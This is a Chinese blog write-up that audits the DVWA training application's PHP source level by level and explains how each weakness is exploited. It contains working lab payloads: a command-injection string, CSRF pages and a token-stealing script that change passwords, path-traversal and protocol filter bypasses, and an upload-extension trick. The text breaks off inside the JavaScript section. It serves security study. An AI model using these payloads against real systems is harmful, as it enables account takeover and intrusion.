DVWA 代码审计WP
浏览 629 | 评论 0 | 字数 54078
硝基苯
2022年01月12日
  • 很长时间没碰安全,有些生疏,且为了学习代码审计,便把DVWA翻出来再看一看,本文章主要是从代码的角度去分析漏洞,而不是黑盒测试的思路。希望本文能给各位师傅一些帮助。(sqli因为刷过sqli-labs-master所以不是很想再看了。后续有时间我会把后面的WP给整理后放出,前面的WP确实写得不太行,后面也会考虑重写)


    Brute Force

    low等级

    审计代码
    19893-m9r0btp3zwf.png
    漏洞点一:
    可以看到,虽然password会被md5无法注入,但是username没做过滤,所以存在SQLI,且最后会返回查询的内容,所以我们可以采用联合查询注入来出。因为报错没有关,也可以使用报错注入,注入内容放到后面
    98002-svt2dfz00v.png
    漏洞点二:
    没有进行次数限制,所以可以采用爆破的手段直接爆破得到密码

    medium等级

    69876-6ds4gwlyphp.png
    从代码中,我们不难看出,现在代码用了mysqli_real_escape_string函数来转义特殊字符,SQLI不存在。
    当密码输入错误时,延迟2s,返回密码错误,也是直接爆破即可

    high等级

    35940-2m5bpzjqn4s.png
    开头就很显眼,第一步就是检测token不一致,重定向会index.php
    42867-y4vaqtkyjt.png

    这里用了stripslashes函数用于转义,进一步对sqli进行防护。
    最后一个else,密码输入错误,随机延时,干扰用户判断登录是否成功。
    83494-16zagutlvo4.png
    session_token是随机生成的。每次页面都会随机生成一个token,进行判断,如果相等则进入sql语句中查询。
    f12可以看到有个user_token,这个传到上面进行判断
    70735-frx18hg7b9h.png
    所以,我们抓包要获取到响应的user_token作为下一次请求的user_token,以此来绕过爆破

    我们通过请求体可以看到
    65962-7l3z0i6miwd.png
    多了一个user_token,重复放包会发现302跳转,说明这里用user_token进行了防爆破的一个保护,当我们输入密码错误时,会返回到登录界面,这个时候user_token就会进行一次刷新。
    F12可以发现
    49113-oxoant5r1h.png
    页面刷新时会随机产生一个新的user_token,所以,我们需要做的就是将每次这个user_token带入请求中去请求
    方法一:
    采用Burpsuit
    设置爆破位置
    81091-rjp8wcec3hh.png

    设置正则匹配的回显
    09663-0zm14py785o.png

    双击值,自动生成正则
    40085-grja7hym84h.png
    自动获得刚刚的负载
    16781-d2qcip8x03c.png
    线程要求设为1
    26841-zyuhyuoaw0f.png
    开始爆破
    85889-wxywy3wwx1.png

    方法二:
    写爬虫去获取,网上WP挺多,我也不再写了

    impossible

    17005-ehajbp7ld9a.png
    不仅有checktoken,还有次数时间限制,运用了预编译来防止sqli的可能
    70920-nu6pvuqymb.png
    无论是错误还是被锁,一样回显,确保安全

    Command Injection

    前期知识

    常用的命令执行的函数https://www.cnblogs.com/-qing-/p/10819069.html

    linux连接符

    & 表示任务在后台执行,如要在后台运行redis-server,则有 redis-server &
    && 表示前一条命令执行成功时,才执行后一条命令 ,如 echo '1‘ && echo '2'
    | 表示管道,上一条命令的输出,作为下一条命令参数,如 echo 'yes' | wc -l
    || 表示上一条命令执行失败后,才执行下一条命令,如 cat nofile || echo "fail"
    ;分号表示命令依次执行

    windows连接符

    windows系统有哪些命令行拼接符。
    A&&B,A执行成功后执行B
    A&B,分别执行
    A|B,表示A命令语句的输出,作为B命令语句的输入执行。
    A||B,表示A命令语句执行失败,然后才执行B命令语句。

    low

    1. <?php
    2. if( isset( $_POST[ 'Submit' ] ) ) {
    3. // Get input
    4. $target = $_REQUEST[ 'ip' ];
    5. // Determine OS and execute the ping command.
    6. if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    7. // Windows
    8. $cmd = shell_exec( 'ping ' . $target );
    9. }
    10. else {
    11. // *nix
    12. $cmd = shell_exec( 'ping -c 4 ' . $target );
    13. }
    14. // Feedback for the end user
    15. $html .= "<pre>{$cmd}</pre>";
    16. }
    17. ?>

    首先检测系统名称,stristr忽略大小写匹配出现的位置,调用shell_exec函数,进行命令执行
    可以看到,直接拼接,没有过滤,直接打payload即可0.0.0.0||whoami
    25577-l9btkvcz5ke.png

    medium

    1. <?php
    2. if( isset( $_POST[ 'Submit' ] ) ) {
    3. // Get input
    4. $target = $_REQUEST[ 'ip' ];
    5. // Set blacklist
    6. $substitutions = array(
    7. '&&' => '',
    8. ';' => '',
    9. );
    10. // Remove any of the charactars in the array (blacklist).
    11. $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    12. // Determine OS and execute the ping command.
    13. if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    14. // Windows
    15. $cmd = shell_exec( 'ping ' . $target );
    16. }
    17. else {
    18. // *nix
    19. $cmd = shell_exec( 'ping -c 4 ' . $target );
    20. }
    21. // Feedback for the end user
    22. $html .= "<pre>{$cmd}</pre>";
    23. }
    24. ?>

    在这两步进行了过滤

    但是仅过滤了&&以及;,所以该绕还是能绕。只要不出现上述两个字符串即可

    high

    1. <?php
    2. if( isset( $_POST[ 'Submit' ] ) ) {
    3. // Get input
    4. $target = trim($_REQUEST[ 'ip' ]);
    5. // Set blacklist
    6. $substitutions = array(
    7. '&' => '',
    8. ';' => '',
    9. '| ' => '',
    10. '-' => '',
    11. '$' => '',
    12. '(' => '',
    13. ')' => '',
    14. '`' => '',
    15. '||' => '',
    16. );
    17. // Remove any of the charactars in the array (blacklist).
    18. $target = str_replace( array_keys( $substitutions ), $substitutions, $target );
    19. // Determine OS and execute the ping command.
    20. if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    21. // Windows
    22. $cmd = shell_exec( 'ping ' . $target );
    23. }
    24. else {
    25. // *nix
    26. $cmd = shell_exec( 'ping -c 4 ' . $target );
    27. }
    28. // Feedback for the end user
    29. $html .= "<pre>{$cmd}</pre>";
    30. }
    31. ?>

    黑名单过滤的是”| ”而非“|”,所以可以绕过

    impossible

    1. <?php
    2. if( isset( $_POST[ 'Submit' ] ) ) {
    3. // Check Anti-CSRF token
    4. checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    5. // Get input
    6. $target = $_REQUEST[ 'ip' ];
    7. $target = stripslashes( $target );
    8. // Split the IP into 4 octects
    9. $octet = explode( ".", $target );
    10. // Check IF each octet is an integer
    11. if( ( is_numeric( $octet[0] ) ) && ( is_numeric( $octet[1] ) ) && ( is_numeric( $octet[2] ) ) && ( is_numeric( $octet[3] ) ) && ( sizeof( $octet ) == 4 ) ) {
    12. // If all 4 octets are int's put the IP back together.
    13. $target = $octet[0] . '.' . $octet[1] . '.' . $octet[2] . '.' . $octet[3];
    14. // Determine OS and execute the ping command.
    15. if( stristr( php_uname( 's' ), 'Windows NT' ) ) {
    16. // Windows
    17. $cmd = shell_exec( 'ping ' . $target );
    18. }
    19. else {
    20. // *nix
    21. $cmd = shell_exec( 'ping -c 4 ' . $target );
    22. }
    23. // Feedback for the end user
    24. $html .= "<pre>{$cmd}</pre>";
    25. }
    26. else {
    27. // Ops. Let the user name theres a mistake
    28. $html .= '<pre>ERROR: You have entered an invalid IP.</pre>';
    29. }
    30. }
    31. // Generate Anti-CSRF token
    32. generateSessionToken();
    33. ?>

    stripslashes函数转义,explode将输入的字符串通过.分割成数组,进而用is_numeric进行判断是否为数字,最后重新拼接,放到函数中执行。杜绝了rce的可能

    CSRF

    low

    1. <?php
    2. if( isset( $_GET[ 'Change' ] ) ) {
    3. // Get input
    4. $pass_new = $_GET[ 'password_new' ];
    5. $pass_conf = $_GET[ 'password_conf' ];
    6. // Do the passwords match?
    7. if( $pass_new == $pass_conf ) {
    8. // They do!
    9. $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    10. $pass_new = md5( $pass_new );
    11. // Update the database
    12. $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
    13. $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    14. // Feedback for the user
    15. $html .= "<pre>Password Changed.</pre>";
    16. }
    17. else {
    18. // Issue with passwords matching
    19. $html .= "<pre>Passwords did not match.</pre>";
    20. }
    21. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
    22. }
    23. ?>

    从代码中我们可以看出,未经验证,直接get 一个Change、password_new、password_conf即可完成密码的修改,利用管理员的未知情,浏览器有cookie,即可完成密码的修改
    构造payload
    http://192.168.101.92:8099/dvwa-master/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change
    密码修改成功
    附一个html

    1. <html>
    2. <body>
    3. <iframe sandbox="allow-scripts allow-top-navigation allow-forms" src='data:text/html,<script>var req=new XMLHttpRequest();req.onload=reqListener;req.open("get","http://192.168.101.92:8099/dvwa-master/vulnerabilities/csrf/?password_new=password123&password_conf=password123&Change=Change",true);req.withCredentials=true;req.send();function reqListener(){alert(this.responseText)};</script>'></iframe>
    4. </body>
    5. </html>

    medium

    94783-1ahz8c5to8r.png
    检测的很粗糙,只要有reffer就行

    high

    在这个等级中,我们看到了它新加了一个token,与上面爆破一样,通过js可以获取到那页面的token
    放一个网上找的

    1. alert(document.cookie);
    2. var theUrl = 'http://www.dvwa.com/vulnerabilities/csrf/';
    3. if(window.XMLHttpRequest) {
    4. xmlhttp = new XMLHttpRequest();
    5. }else{
    6. xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    7. }
    8. var count = 0;
    9. xmlhttp.withCredentials = true;
    10. xmlhttp.onreadystatechange=function(){
    11. if(xmlhttp.readyState ==4 && xmlhttp.status==200)
    12. {
    13. var text = xmlhttp.responseText;
    14. var regex = /user_token\' value\=\'(.*?)\' \/\>/;
    15. var match = text.match(regex);
    16. console.log(match);
    17. alert(match[1]);
    18. var token = match[1];
    19. var new_url = 'http://www.dvwa.com/vulnerabilities/csrf/?user_token='+token+'&password_new=test&password_conf=test&Change=Change';
    20. if(count==0){
    21. count++;
    22. xmlhttp.open("GET",new_url,false);
    23. xmlhttp.send();
    24. }
    25. }
    26. };
    27. xmlhttp.open("GET",theUrl,false);
    28. xmlhttp.send();

    impossible

    21802-e4c0w7x5fk.png
    要求输入当前密码,解决了之前的问题,且有token验证,注入条件不存在

    File Inclusion

    文件包含具体内容我将放到其他章节中,在这只是展示

    low

    1. <?php
    2. // The page we wish to display
    3. $file = $_GET[ 'page' ];
    4. ?>
    5. index.php关键代码
    6. if( isset( $file ) )
    7. include( $file );
    8. else {
    9. header( 'Location:?page=include.php' );
    10. exit;
    11. }

    low级别代码很简单
    $file是直接get得来,然后就进入了文件包含
    简单读文件
    75771-6wkjbu4lafk.png
    也可以用绝对路径,注意反斜杠要双写
    26688-azxutm9e1hr.png
    远程文件包含
    要求:allow_url_include = on
    69994-rluxx386z5.png
    也可以getshell
    49280-yoivepus03.png
    其他方法不再赘述

    medium

    1. <?php
    2. // The page we wish to display
    3. $file = $_GET[ 'page' ];
    4. // Input validation
    5. $file = str_replace( array( "http://", "https://" ), "", $file );
    6. $file = str_replace( array( "../", "..\\" ), "", $file );
    7. ?>

    在中级中,http和https协议被过滤,../被过滤,不能路径穿越。但我们注意到,他用了str_replace,并不会遍历,双写即可绕过
    htthttp://p://
    92401-jb4wszxzf6r.png
    ..././
    15022-gvv2wyxfjfo.png

    high

    1. <?php
    2. // The page we wish to display
    3. $file = $_GET[ 'page' ];
    4. // Input validation
    5. if( !fnmatch( "file*", $file ) && $file != "include.php" ) {
    6. // This isn't the page we want!
    7. echo "ERROR: File not found!";
    8. exit;
    9. }
    10. ?>

    fnmatch函数用于匹配指定文件,要求文件名一定要有file开头,那简单绕过即可
    13191-8dcxwrazhb8.png
    也可以用file://协议读文件,都行
    08951-8tw4ms8j99e.png

    impossible

    1. <?php
    2. // The page we wish to display
    3. $file = $_GET[ 'page' ];
    4. // Only allow include.php or file{1..3}.php
    5. if( $file != "include.php" && $file != "file1.php" && $file != "file2.php" && $file != "file3.php" ) {
    6. // This isn't the page we want!
    7. echo "ERROR: File not found!";
    8. exit;
    9. }
    10. ?>

    已经写死,没办法再文件包含

    File Upload

    low

    1. <?php
    2. if( isset( $_POST[ 'Upload' ] ) ) {
    3. // Where are we going to be writing to?
    4. $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    5. $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    6. // Can we move the file to the upload folder?
    7. if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    8. // No
    9. $html .= '<pre>Your image was not uploaded.</pre>';
    10. }
    11. else {
    12. // Yes!
    13. $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    14. }
    15. }
    16. ?>

    文件上传后,会生成一个临时文件,之后通郭move_uploaded_file函数来完成文件上传的全部过程
    可以看到$target_path直接将文件名与路径进行拼合,没有任何过滤,我们可以路径穿越来进行上传文件,达到文件的覆盖,也可以直接上传
    61359-bjym5snzf9q.png

    medium

    1. <?php
    2. if( isset( $_POST[ 'Upload' ] ) ) {
    3. // Where are we going to be writing to?
    4. $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    5. $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    6. // File information
    7. $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    8. $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    9. $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    10. // Is it an image?
    11. if( ( $uploaded_type == "image/jpeg" || $uploaded_type == "image/png" ) &&
    12. ( $uploaded_size < 100000 ) ) {
    13. // Can we move the file to the upload folder?
    14. if( !move_uploaded_file( $_FILES[ 'uploaded' ][ 'tmp_name' ], $target_path ) ) {
    15. // No
    16. $html .= '<pre>Your image was not uploaded.</pre>';
    17. }
    18. else {
    19. // Yes!
    20. $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    21. }
    22. }
    23. else {
    24. // Invalid file
    25. $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    26. }
    27. }
    28. ?>

    在这段代码中,文件名以及路径仍然是用户可控,限制了文件大小,限制了Content-Type类型,绕过即可
    01057-zit29x4y0f.png

    high

    1. <?php
    2. if( isset( $_POST[ 'Upload' ] ) ) {
    3. // Where are we going to be writing to?
    4. $target_path = DVWA_WEB_PAGE_TO_ROOT . "hackable/uploads/";
    5. $target_path .= basename( $_FILES[ 'uploaded' ][ 'name' ] );
    6. // File information
    7. $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    8. $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    9. $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    10. $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    11. // Is it an image?
    12. if( ( strtolower( $uploaded_ext ) == "jpg" || strtolower( $uploaded_ext ) == "jpeg" || strtolower( $uploaded_ext ) == "png" ) &&
    13. ( $uploaded_size < 100000 ) &&
    14. getimagesize( $uploaded_tmp ) ) {
    15. // Can we move the file to the upload folder?
    16. if( !move_uploaded_file( $uploaded_tmp, $target_path ) ) {
    17. // No
    18. $html .= '<pre>Your image was not uploaded.</pre>';
    19. }
    20. else {
    21. // Yes!
    22. $html .= "<pre>{$target_path} succesfully uploaded!</pre>";
    23. }
    24. }
    25. else {
    26. // Invalid file
    27. $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    28. }
    29. }
    30. ?>

    取最后一个点,来做白名单的匹配,我们可以看到它还用了一个getmagesize的函数

    getimagesize() 函数将测定任何 GIF,JPG,PNG,SWF,SWC,PSD,TIFF,BMP,IFF,JP2,JPX,JB2,JPC,XBM 或 WBMP 图像文件的大小并返回图像的尺寸以及文件类型和一个可以用于普通 HTML 文件中 IMG 标记中的 height/width 文本字符串。

    因为存在白名单,所以要想办法进行截断
    参考连接:https://www.cnblogs.com/backlion/p/13083120.html
    这里采用了jsshell.php:.png,成功绕过
    39468-6vv5e8p3lms.png
    50611-puys8afij.png

    impossible

    1. <?php
    2. if( isset( $_POST[ 'Upload' ] ) ) {
    3. // Check Anti-CSRF token
    4. checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );
    5. // File information
    6. $uploaded_name = $_FILES[ 'uploaded' ][ 'name' ];
    7. $uploaded_ext = substr( $uploaded_name, strrpos( $uploaded_name, '.' ) + 1);
    8. $uploaded_size = $_FILES[ 'uploaded' ][ 'size' ];
    9. $uploaded_type = $_FILES[ 'uploaded' ][ 'type' ];
    10. $uploaded_tmp = $_FILES[ 'uploaded' ][ 'tmp_name' ];
    11. // Where are we going to be writing to?
    12. $target_path = DVWA_WEB_PAGE_TO_ROOT . 'hackable/uploads/';
    13. //$target_file = basename( $uploaded_name, '.' . $uploaded_ext ) . '-';
    14. $target_file = md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    15. $temp_file = ( ( ini_get( 'upload_tmp_dir' ) == '' ) ? ( sys_get_temp_dir() ) : ( ini_get( 'upload_tmp_dir' ) ) );
    16. $temp_file .= DIRECTORY_SEPARATOR . md5( uniqid() . $uploaded_name ) . '.' . $uploaded_ext;
    17. // Is it an image?
    18. if( ( strtolower( $uploaded_ext ) == 'jpg' || strtolower( $uploaded_ext ) == 'jpeg' || strtolower( $uploaded_ext ) == 'png' ) &&
    19. ( $uploaded_size < 100000 ) &&
    20. ( $uploaded_type == 'image/jpeg' || $uploaded_type == 'image/png' ) &&
    21. getimagesize( $uploaded_tmp ) ) {
    22. // Strip any metadata, by re-encoding image (Note, using php-Imagick is recommended over php-GD)
    23. if( $uploaded_type == 'image/jpeg' ) {
    24. $img = imagecreatefromjpeg( $uploaded_tmp );
    25. imagejpeg( $img, $temp_file, 100);
    26. }
    27. else {
    28. $img = imagecreatefrompng( $uploaded_tmp );
    29. imagepng( $img, $temp_file, 9);
    30. }
    31. imagedestroy( $img );
    32. // Can we move the file to the web root from the temp folder?
    33. if( rename( $temp_file, ( getcwd() . DIRECTORY_SEPARATOR . $target_path . $target_file ) ) ) {
    34. // Yes!
    35. $html .= "<pre><a href='${target_path}${target_file}'>${target_file}</a> succesfully uploaded!</pre>";
    36. }
    37. else {
    38. // No
    39. $html .= '<pre>Your image was not uploaded.</pre>';
    40. }
    41. // Delete any temp files
    42. if( file_exists( $temp_file ) )
    43. unlink( $temp_file );
    44. }
    45. else {
    46. // Invalid file
    47. $html .= '<pre>Your image was not uploaded. We can only accept JPEG or PNG images.</pre>';
    48. }
    49. }
    50. // Generate Anti-CSRF token
    51. generateSessionToken();
    52. ?>

    后缀提取出来,文件名md5,后缀过白名单后进行拼接。
    用imagecreatefromjpeg函数、imagejpeg函数来生成图片文件。
    确实牛

    Insecure CAPTCHA

    low

    如果没注册上也无所谓,不影响做题

    1. <?php
    2. if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '1' ) ) {
    3. // Hide the CAPTCHA form
    4. $hide_form = true;
    5. // Get input
    6. $pass_new = $_POST[ 'password_new' ];
    7. $pass_conf = $_POST[ 'password_conf' ];
    8. // Check CAPTCHA from 3rd party
    9. $resp = recaptcha_check_answer(
    10. $_DVWA[ 'recaptcha_private_key'],
    11. $_POST['g-recaptcha-response']
    12. );
    13. // Did the CAPTCHA fail?
    14. if( !$resp ) {
    15. // What happens when the CAPTCHA was entered incorrectly
    16. $html .= "<pre><br />The CAPTCHA was incorrect. Please try again.</pre>";
    17. $hide_form = false;
    18. return;
    19. }
    20. else {
    21. // CAPTCHA was correct. Do both new passwords match?
    22. if( $pass_new == $pass_conf ) {
    23. // Show next stage for the user
    24. $html .= "
    25. <pre><br />You passed the CAPTCHA! Click the button to confirm your changes.<br /></pre>
    26. <form action=\"#\" method=\"POST\">
    27. <input type=\"hidden\" name=\"step\" value=\"2\" />
    28. <input type=\"hidden\" name=\"password_new\" value=\"{$pass_new}\" />
    29. <input type=\"hidden\" name=\"password_conf\" value=\"{$pass_conf}\" />
    30. <input type=\"submit\" name=\"Change\" value=\"Change\" />
    31. </form>";
    32. }
    33. else {
    34. // Both new passwords do not match.
    35. $html .= "<pre>Both passwords must match.</pre>";
    36. $hide_form = false;
    37. }
    38. }
    39. }
    40. if( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {
    41. // Hide the CAPTCHA form
    42. $hide_form = true;
    43. // Get input
    44. $pass_new = $_POST[ 'password_new' ];
    45. $pass_conf = $_POST[ 'password_conf' ];
    46. // Check to see if both password match
    47. if( $pass_new == $pass_conf ) {
    48. // They do!
    49. $pass_new = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $pass_new ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    50. $pass_new = md5( $pass_new );
    51. // Update database
    52. $insert = "UPDATE `users` SET password = '$pass_new' WHERE user = '" . dvwaCurrentUser() . "';";
    53. $result = mysqli_query($GLOBALS["___mysqli_ston"], $insert ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    54. // Feedback for the end user
    55. $html .= "<pre>Password Changed.</pre>";
    56. }
    57. else {
    58. // Issue with the passwords matching
    59. $html .= "<pre>Passwords did not match.</pre>";
    60. $hide_form = false;
    61. }
    62. ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);
    63. }
    64. ?>

    可以看到
    step2直接不检测验证码,而进行密码修改
    改包就完事了
    14689-n611sobzppk.png

    medium

    代码和low大差不差的,我们直接看关键代码
    53201-fyq1qibdee.png
    和上面一样,但这多一个passed_captcha的检测,但没检测具体内容
    00399-rfq4znov12f.png

    high

    04419-5cg1tj2wehd.png
    关键点:当POST的g-recaptcha-response为hidd3n_valu3并且http_user_agent为reCAPTCHA时,绕过

    impossible

    代码量比较大,不放出来了
    04104-01yl9r5fyyci.png
    太顶了也

    Weak Session IDs

    用户去访问网站时,往往有一个session,本地有一个cookie去访问。如果这个cookie比较好猜的话就可能越权访问其他用户

    low

    1. <?php
    2. $html = "";
    3. if ($_SERVER['REQUEST_METHOD'] == "POST") {
    4. if (!isset ($_SESSION['last_session_id'])) {
    5. $_SESSION['last_session_id'] = 0;
    6. }
    7. $_SESSION['last_session_id']++;
    8. $cookie_value = $_SESSION['last_session_id'];
    9. setcookie("dvwaSession", $cookie_value);
    10. }
    11. ?>

    每请求生成一个sessionID就是+1

    所以我们就改就能越权到其他用户上
    27677-50ypneh6ewg.png

    medium

    1. <?php
    2. $html = "";
    3. if ($_SERVER['REQUEST_METHOD'] == "POST") {
    4. $cookie_value = time();
    5. setcookie("dvwaSession", $cookie_value);
    6. }
    7. ?>

    通过时间戳来设置cookie
    15886-bh2sdvrl20t.png
    没啥好说的

    high

    1. <?php
    2. $html = "";
    3. if ($_SERVER['REQUEST_METHOD'] == "POST") {
    4. if (!isset ($_SESSION['last_session_id_high'])) {
    5. $_SESSION['last_session_id_high'] = 0;
    6. }
    7. $_SESSION['last_session_id_high']++;
    8. $cookie_value = md5($_SESSION['last_session_id_high']);
    9. setcookie("dvwaSession", $cookie_value, time()+3600, "/vulnerabilities/weak_id/", $_SERVER['HTTP_HOST'], false, false);
    10. }
    11. ?>

    63050-tn79b0bvgz.png

    impossible

    1. <?php
    2. $html = "";
    3. if ($_SERVER['REQUEST_METHOD'] == "POST") {
    4. $cookie_value = sha1(mt_rand() . time() . "Impossible");
    5. setcookie("dvwaSession", $cookie_value, time()+3600, "/vulnerabilities/weak_id/", $_SERVER['HTTP_HOST'], true, true);
    6. }
    7. ?>

    用了随机数+时间+字符串后的md5
    无法猜测

    JavaScript

    low

    index.php中
    关键部分代码

    1. if ($token == md5(str_rot13("success"))) {
    2. $message = "<p style='color:red'>Well done!</p>";
    3. } else {
    4. $message = "<p>Invalid token.</p>";
    5. }

    low.php则是js的token生成的方式

    1. <?php
    2. $page[ 'body' ] .= <<<EOF
    3. <script>
    4. /*
    5. MD5 code from here
    6. https://github.com/blueimp/JavaScript-MD5
    7. */
    8. !function(n){"use strict";function t(n,t){var r=(65535&n)+(65535&t);return(n>>16)+(t>>16)+(r>>16)<<16|65535&r}function r(n,t){return n<<t|n>>>32-t}function e(n,e,o,u,c,f){return t(r(t(t(e,n),t(u,f)),c),o)}function o(n,t,r,o,u,c,f){return e(t&r|~t&o,n,t,u,c,f)}function u(n,t,r,o,u,c,f){return e(t&o|r&~o,n,t,u,c,f)}function c(n,t,r,o,u,c,f){return e(t^r^o,n,t,u,c,f)}function f(n,t,r,o,u,c,f){return e(r^(t|~o),n,t,u,c,f)}function i(n,r){n[r>>5]|=128<<r%32,n[14+(r+64>>>9<<4)]=r;var e,i,a,d,h,l=1732584193,g=-271733879,v=-1732584194,m=271733878;for(e=0;e<n.length;e+=16)i=l,a=g,d=v,h=m,g=f(g=f(g=f(g=f(g=c(g=c(g=c(g=c(g=u(g=u(g=u(g=u(g=o(g=o(g=o(g=o(g,v=o(v,m=o(m,l=o(l,g,v,m,n[e],7,-680876936),g,v,n[e+1],12,-389564586),l,g,n[e+2],17,606105819),m,l,n[e+3],22,-1044525330),v=o(v,m=o(m,l=o(l,g,v,m,n[e+4],7,-176418897),g,v,n[e+5],12,1200080426),l,g,n[e+6],17,-1473231341),m,l,n[e+7],22,-45705983),v=o(v,m=o(m,l=o(l,g,v,m,n[e+8],7,1770035416),g,v,n[e+9],12,-1958414417),l,g,n[e+10],17,-42063),m,l,n[e+11],22,-1990404162),v=o(v,m=o(m,l=o(l,g,v,m,n[e+12],7,1804603682),g,v,n[e+13],12,-40341101),l,g,n[e+14],17,-1502002290),m,l,n[e+15],22,1236535329),v=u(v,m=u(m,l=u(l,g,v,m,n[e+1],5,-165796510),g,v,n[e+6],9,-1069501632),l,g,n[e+11],14,643717713),m,l,n[e],20,-373897302),v=u(v,m=u(m,l=u(l,g,v,m,n[e+5],5,-701558691),g,v,n[e+10],9,38016083),l,g,n[e+15],14,-660478335),m,l,n[e+4],20,-405537848),v=u(v,m=u(m,l=u(l,g,v,m,n[e+9],5,568446438),g,v,n[e+14],9,-1019803690),l,g,n[e+3],14,-187363961),m,l,n[e+8],20,1163531501),v=u(v,m=u(m,l=u(l,g,v,m,n[e+13],5,-1444681467),g,v,n[e+2],9,-51403784),l,g,n[e+7],14,1735328473),m,l,n[e+12],20,-1926607734),v=c(v,m=c(m,l=c(l,g,v,m,n[e+5],4,-378558),g,v,n[e+8],11,-2022574463),l,g,n[e+11],16,1839030562),m,l,n[e+14],23,-35309556),v=c(v,m=c(m,l=c(l,g,v,m,n[e+1],4,-1530992060),g,v,n[e+4],11,1272893353),l,g,n[e+7],16,-155497632),m,l,n[e+10],23,-1094730640),v=c(v,m=c(m,l=c(l,g,v,m,n[e+13],4,681279174),g,v,n[e],11,-358537222),l,g,n[e+3],16,-722521979),m,l,n[e+6],23,76029189),v=c(v,m=c(m,l=c(l,g,v,m,n[e+9],4,-640364487),g,v,n[e+12],11,-421815835),l,g,n[e+15],16,530742520),m,l,n[e+2],23,-995338651),v=f(v,m=f(m,l=f(l,g,v,m,n[e],6,-198630844),g,v,n[e+7],10,1126891415),l,g,n[e+14],15,-1416354905),m,l,n[e+5],21,-57434055),v=f(v,m=f(m,l=f(l,g,v,m,n[e+12],6,1700485571),g,v,n[e+3],10,-1894986606),l,g,n[e+10],15,-1051523),m,l,n[e+1],21,-2054922799),v=f(v,m=f(m,l=f(l,g,v,m,n[e+8],6,1873313359),g,v,n[e+15],10,-30611744),l,g,n[e+6],15,-1560198380),m,l,n[e+13],21,1309151649),v=f(v,m=f(m,l=f(l,g,v,m,n[e+4],6,-145523070),g,v,n[e+11],10,-1120210379),l,g,n[e+2],15,718787259),m,l,n[e+9],21,-343485551),l=t(l,i),g=t(g,a),v=t(v,d),m=t(m,h);return[l,g,v,m]}function a(n){var t,r="",e=32*n.length;for(t=0;t<e;t+=8)r+=String.fromCharCode(n[t>>5]>>>t%32&255);return r}function d(n){var t,r=[];for(r[(n.length>>2)-1]=void 0,t=0;t<r.length;t+=1)r[t]=0;var e=8*n.length;for(t=0;t<e;t+=8)r[t>>5]|=(255&n.charCodeAt(t/8))<<t%32;return r}function h(n){return a(i(d(n),8*n.length))}function l(n,t){var r,e,o=d(n),u=[],c=[];for(u[15]=c[15]=void 0,o.length>16&&(o=i(o,8*n.length)),r=0;r<16;r+=1)u[r]=909522486^o[r],c[r]=1549556828^o[r];return e=i(u.concat(d(t)),512+8*t.length),a(i(c.concat(e),640))}function g(n){var t,r,e="";for(r=0;r<n.length;r+=1)t=n.charCodeAt(r),e+="0123456789abcdef".charAt(t>>>4&15)+"0123456789abcdef".charAt(15&t);return e}function v(n){return unescape(encodeURIComponent(n))}function m(n){return h(v(n))}function p(n){return g(m(n))}function s(n,t){return l(v(n),v(t))}function C(n,t){return g(s(n,t))}function A(n,t,r){return t?r?s(t,n):C(t,n):r?m(n):p(n)}"function"==typeof define&&define.amd?define(function(){return A}):"object"==typeof module&&module.exports?module.exports=A:n.md5=A}(this);
    9. function rot13(inp) {
    10. return inp.replace(/[a-zA-Z]/g,function(c){return String.fromCharCode((c<="Z"?90:122)>=(c=c.charCodeAt(0)+13)?c:c-26);});
    11. }
    12. function generate_token() {
    13. var phrase = document.getElementById("phrase").value;
